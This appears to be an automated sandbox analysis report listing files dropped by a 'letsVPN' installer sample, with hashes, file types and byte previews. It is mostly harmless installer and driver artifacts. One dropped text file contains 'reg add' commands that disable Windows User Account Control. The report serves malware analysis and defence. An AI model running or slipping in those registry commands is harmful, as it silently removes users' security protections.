                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........{HB.z..S...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1........Get-NetSwitchTeam........Add-NetSwitchTeamMember........Get-NetSwitchTeamMember........Remove-NetSwitchTeamMember........New-NetSwitchTeam........Rename-NetSwitchTeam........Remove-NetSwitchTeam..........zB.z..E...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1........Get-NetQosPolicy........Remove-Ne
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2240
                                                                                                                                                                                                  Entropy (8bit):5.375009441102135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:BBWSU4xymI4RfoUeW+gZ9tK8NPP8xL7u1iMuge//ZPn9yuE:BBLHxvIIwLgZ2KHuLOugYE
                                                                                                                                                                                                  MD5:6189BE3FC23AC08D774F6B12AA130955
                                                                                                                                                                                                  SHA1:70B5F047828AFDD29A75C47F9AA454F08F22A316
                                                                                                                                                                                                  SHA-256:4D99710F2D00924C8785E449988A40C225EEFCB4AFED8F749E3CDF9F8701D9D7
                                                                                                                                                                                                  SHA-512:717EEEA55094E75662984F019F1D58C3F2948CA07F87BF78AE3AC809B2BE3064302F5320B3CCF45550E84CE9A42CC6770E7C829EB8CF4D6DE9AD55219D356F02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:@...e...................................J.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):5.804946284177748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                                                  MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                                                  SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                                                  SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                                                  SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 150 x 57 x 8, image size 8666, resolution 2834 x 2834 px/m, 255 important colors, cbSize 9740, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9740
                                                                                                                                                                                                  Entropy (8bit):6.554125039233327
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:bDIK82wKywC116+rwdTKMRjwgKhww4R1jwlIHvNbmwQo8TTJG4:bv82wKywC7DrwdTKMRjwgKhwwY1jwlQq
                                                                                                                                                                                                  MD5:5ACF495828FEAE7F85E006B7774AF497
                                                                                                                                                                                                  SHA1:5D2EEF3EEBB9A72678DCCD404475341116508306
                                                                                                                                                                                                  SHA-256:6CFEBB59F0BA1B9F1E8D7AA6387F223A468EB2FF74A9ED3C3F4BB688C2B6455E
                                                                                                                                                                                                  SHA-512:D1D40C88E2167315A309005B831ACBEAB0919D5A3B1FF5AAA273DB945C8818FC2118EFDB503E4BDA055F309306E72224F54DEF0B1F0AB6F61FE4DBA66784ED68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51498, resolution 2834 x 2834 px/m, 255 important colors, cbSize 52572, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52572
                                                                                                                                                                                                  Entropy (8bit):7.144132089574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mfR2FYRtCc9X1uikvgqm+LPTTw9Bu8Skn+x23acmHjZXuxZpCAe9Crxpn319UDSQ:mf0YRt/km+b3wG0nt2UC6rOf
                                                                                                                                                                                                  MD5:7F8E1969B0874C8FB9AB44FC36575380
                                                                                                                                                                                                  SHA1:3057C9CE90A23D29F7D0854472F9F44E87B0F09A
                                                                                                                                                                                                  SHA-256:076221B4527FF13C3E1557ABBBD48B0CB8E5F7D724C6B9171C6AADADB80561DD
                                                                                                                                                                                                  SHA-512:7AA65CFADC2738C0186EF459D0F5F7F770BA0F6DA4CCD55A2CECA23627B7F13BA258136BAB88F4EEE5D9BB70ED0E8EB8BA8E1874B0280D2B08B69FC9BDD81555
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                  Entropy (8bit):5.157714967617029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                                                                                                                                  MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                                                                                                                                  SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                                                                                                                                  SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                                                                                                                                  SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7168
                                                                                                                                                                                                  Entropy (8bit):5.295306975422517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                                                                                                                                  MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                                                                                                                                  SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                                                                                                                                  SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                                                                                                                                  SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4608
                                                                                                                                                                                                  Entropy (8bit):4.703695912299512
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Sz4joMeH+Iwdf8Rom/L+rOnnk5/OCnXeAdbdOAa4GPI+CJ87eILzlq7gthwIsEQW:64c/eFdfS/SSnkxNa4G+ueqPuCtGsj
                                                                                                                                                                                                  MD5:F0438A894F3A7E01A4AAE8D1B5DD0289
                                                                                                                                                                                                  SHA1:B058E3FCFB7B550041DA16BF10D8837024C38BF6
                                                                                                                                                                                                  SHA-256:30C6C3DD3CC7FCEA6E6081CE821ADC7B2888542DAE30BF00E881C0A105EB4D11
                                                                                                                                                                                                  SHA-512:F91FCEA19CBDDF8086AFFCB63FE599DC2B36351FC81AC144F58A80A524043DDEAA3943F36C86EBAE45DD82E8FAF622EA7B7C9B776E74C54B93DF2963CFE66CC7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:29:21 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.633294007248609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mEXmEAdOE4N55iAsx1dyOd/UUwuEAENqygm:8mEXZAdObBsx1dyOdsIVFyg
                                                                                                                                                                                                  MD5:259DA0DED9E0C1F58D8543433095A921
                                                                                                                                                                                                  SHA1:2FD579DBF5B001B8F343961CC27C63874F42CF93
                                                                                                                                                                                                  SHA-256:5ACF716A416340D469F9BD9A7A13C716737773B89B68832CAA9DBCF2F89F21BF
                                                                                                                                                                                                  SHA-512:1411B62C8B75B5435708F0DEDEFE65CDD85125F2B513D6ABDE1C2795CCAD203F84708CC4CE43C400334CFCD0F4693899D475CB4BFD7E4CD0B169578EECDAF8F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F.... ....-.D.D.....n.Z...-.D.D.. ............................P.O. .:i.....+00.../C:\.....................1......Y.{..PROGRA~2.........O.I.Y.{....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......Y.{..letsvpn.@......Y.{.Y.{............................d.l.e.t.s.v.p.n.....b.2. ....YU4 .LetsPRO.exe.H......YU4.Y.{..............................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X.............#......C:\Program Files (x86)\letsvpn\LetsPRO.exe..B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.........`.......X.......932923...........hT..CrF.f4... ..*......,...W..hT..CrF.f4... ..*......,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):824
                                                                                                                                                                                                  Entropy (8bit):3.377677862485207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:8wl0Va/ledp8A/LK4YRMbdpYgRtbdpYqQ/CNUvH4t2YZ/elFlSJm:8BdOAW4Y+djXdYOUFqy
                                                                                                                                                                                                  MD5:0011458DE2BFE4556889186A69473E2A
                                                                                                                                                                                                  SHA1:03B075F79791A3EA20E0CA82DC375F1E980C4386
                                                                                                                                                                                                  SHA-256:DB3312C1A2D480E1416930D0F28A1EDA75143B3FDF312C1F19510534FD37B9FA
                                                                                                                                                                                                  SHA-512:DA5DD6E5A253F13702DEB42BBA8E37349CB262F311D557B8891AD761387AF2B96B6B91E4BF7E637D3A7C14E2BFE61E476E44703417DE79930B210243A1B20082
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F........................................................_....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".V.1...........letsvpn.@............................................l.e.t.s.v.p.n.....`.2...........uninst.exe..F............................................u.n.i.n.s.t...e.x.e.......A.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.u.n.i.n.s.t...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):392
                                                                                                                                                                                                  Entropy (8bit):5.141040221765098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:jLMVjhR1mWEMlTLMVjhR1ZTLMVjhR16Xn:jIV1PMmIV1PZIV1P6X
                                                                                                                                                                                                  MD5:30D6EB22D6AEEC10347239B17B023BF4
                                                                                                                                                                                                  SHA1:E2A6F86D66C699F6E0FF1AC4E140AF4A2A4637D1
                                                                                                                                                                                                  SHA-256:659DF6B190A0B92FC34E3A4457B4A8D11A26A4CAF55DE64DFE79EB1276181F08
                                                                                                                                                                                                  SHA-512:500872C3F2F3F801EC51717690873194675CB7F32CC4A862C09D90C18638D364D49B0E04C32323F52734E5C806E3503A63AC755C7019D762786A72840123DF76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F ..
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:29:43 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1064
                                                                                                                                                                                                  Entropy (8bit):4.669417118259061
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8m0CmEAdOE46R35iAsxXdyOd/UUwuEAENqygm:8m1ZAdOWBsxXdyOdsIVFyg
                                                                                                                                                                                                  MD5:3E8018425B28739FF6113A286C7005A4
                                                                                                                                                                                                  SHA1:B16F750B329CF06CBF6E8D316B5B35DED55D46FA
                                                                                                                                                                                                  SHA-256:F94E6F55AC278E498EC0C4D0145584D7FACEAE69A28C05B13768769B862486A1
                                                                                                                                                                                                  SHA-512:1197A04EFA78B50688CB1E9B43EDD519193DD272CD33D8FF981BA8D19158A789609C78AB5A0B39D9154871C46597C5FE62616B5CEB939A944BA2F5E4EE97346E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
